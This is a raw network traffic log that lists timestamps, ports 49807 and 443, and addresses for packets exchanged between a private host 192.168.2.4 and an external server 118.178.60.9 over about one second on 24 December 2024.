Dec 24, 2024 15:13:31.400540113 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.402231932 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.402282953 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.403666019 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.403717995 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.404499054 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.404547930 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.406197071 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.406253099 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.407864094 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.407924891 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.409086943 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.409133911 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.411401987 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.411457062 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.412250996 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.412302971 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.413958073 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.414010048 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.414938927 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.414984941 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.416584015 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.416635036 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.418256998 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.418306112 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.419222116 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.419296980 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.420922995 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.420986891 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.422600031 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.422646999 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.423625946 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.423677921 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.425667048 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.425721884 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.426791906 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.426843882 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.428277016 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.428327084 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.429949999 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.429996967 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.430880070 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.430926085 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.432944059 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.432998896 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.434392929 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.434441090 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.435184002 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.435228109 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.436856031 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.436906099 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.438596964 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.438649893 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.440381050 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.440429926 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.441494942 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.441545963 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.442989111 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.443059921 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.590491056 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.590617895 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.592014074 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.592063904 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.593244076 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.593292952 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.594506025 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.594552040 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.596879005 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.596925020 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.598139048 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.598191977 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.599066019 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.599117041 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.600570917 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.600622892 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.601919889 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.601969004 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.603631020 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.603682041 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.605036020 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.605084896 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.606205940 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.606259108 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.607942104 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.607991934 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.609142065 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.609191895 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.610552073 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.610619068 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.612303019 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.612354040 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.613220930 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.613267899 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.614942074 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.614996910 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.616667032 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.616718054 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.618077040 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.618132114 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.620347023 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.620395899 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.620539904 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.620590925 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.622268915 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.622315884 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.624020100 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.624085903 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.625026941 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.625082970 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.626542091 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.626595974 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.628866911 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.628925085 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.629615068 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.629664898 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.630978107 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.631026030 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.632615089 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.632671118 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.633593082 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.633646011 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.636101007 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.636153936 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.783344030 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.783411026 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.784394979 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.784455061 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.786078930 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.786134005 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.787636042 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.787691116 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.788585901 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.788636923 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.790843010 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.790895939 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.792037010 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.792083979 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.793709993 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.793766022 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.794857979 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.794910908 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.796360970 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.796412945 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.798063040 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.798114061 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.799109936 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.799165010 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.800738096 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.800789118 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.802381039 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.802433968 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.803333998 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.803383112 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.805263996 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.805311918 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.806715012 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.806771994 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.807996035 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.808047056 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.809842110 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.809921026 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.810708046 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.810750961 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.812392950 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.812448025 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.814043045 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.814106941 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.815040112 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.815093040 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.816857100 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.816911936 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.818707943 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.818762064 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.820002079 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.820059061 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.821522951 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.821578026 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.822712898 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.822762966 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.823618889 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.823666096 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.825381041 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.825428009 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.827040911 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.827105045 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.828000069 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.828058004 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.976110935 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.976188898 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.977708101 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.977771044 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.978609085 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.978661060 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.980853081 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.980901003 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.982151985 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.982203007 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.983831882 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.983879089 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.985130072 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.985208035 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.986453056 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.986625910 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.988059044 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.988120079 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.989001036 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.989106894 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.990659952 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.990715027 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.992433071 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.992486000 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.993411064 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.993459940 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.995064020 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.995114088 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.996778011 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.996829033 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.998606920 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.998658895 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:31.999512911 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:31.999564886 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.001022100 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.001076937 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.002140999 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.002192974 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.004102945 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.004154921 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.005906105 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.005956888 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.007411957 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.007462025 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.008403063 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.008456945 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.009531975 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.009584904 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.011152983 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.011204004 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.012765884 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.012814999 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.014337063 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.014389038 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.015460968 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.015511990 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.017061949 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.017113924 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.018057108 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.018106937 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.019848108 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.019901037 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.168862104 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.168951988 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.170025110 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.170075893 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.171468019 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.171525955 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.172312021 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.172367096 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.174047947 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.174101114 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.175251961 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.175307989 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.176630020 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.176682949 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.178345919 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.178397894 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.179492950 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.179564953 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.180924892 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.180980921 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.182794094 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.182858944 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.183715105 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.183765888 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.185596943 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.185650110 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.186975002 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.187031031 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.188271999 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.188317060 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.189718962 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.189805031 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.191308975 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.191363096 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.192246914 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.192295074 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.194184065 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.194235086 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.195628881 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.195682049 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.197573900 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.197626114 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.198775053 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.198829889 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.200508118 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.200577021 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.201450109 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.201503038 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.203187943 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.203248024 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.203943968 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.203994036 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.205696106 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.205763102 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.207402945 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.207458973 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.208612919 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.208674908 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.210187912 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.210248947 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.211678982 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.211744070 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.213423014 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.213483095 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.362318993 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.362381935 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.363300085 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.363348961 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.365075111 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.365120888 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.366045952 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.366086960 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.367604017 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.367655993 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.369323015 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.369369030 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.370402098 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.370445967 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.371973991 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.372016907 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.373692989 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.373739958 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.374922991 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.374974012 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.376846075 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.376893044 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.377954006 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.378006935 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.378952026 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:32.378992081 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:32.380601883 CET	443	49807	118.178.60.9	192.168.2.4
